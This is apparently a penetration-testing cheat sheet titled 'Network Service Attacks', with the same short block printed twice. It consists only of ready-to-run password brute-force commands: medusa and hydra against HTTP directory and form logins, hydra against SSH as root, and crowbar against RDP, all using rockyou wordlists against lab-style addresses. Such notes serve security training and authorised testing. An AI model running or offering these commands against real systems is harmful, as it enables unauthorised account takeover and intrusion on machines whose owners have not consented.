Network Service Attacks

HTTP

medusa -h <url> -u <user> -p <wordlist> -M http -m DIR:/<directory>

medusa -h 10.11.0.22 -u admin -P /usr/share/seclists/Passwords/rockyou.txt -M http -m DIR:/admin

hydra <url> http-form-post "<login page>:user=<user>&pass=^PASS^:<error string>" -l <user> -P <passwords list> -vV -f

hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1

crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

Last updated 1 year ago

medusa -h <url> -u <user> -p <wordlist> -M http -m DIR:/<directory>

medusa -h 10.11.0.22 -u admin -P /usr/share/seclists/Passwords/rockyou.txt -M http -m DIR:/admin

hydra <url> http-form-post "<login page>:user=<user>&pass=^PASS^:<error string>" -l <user> -P <passwords list> -vV -f

hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1

crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

Last updated 1 year ago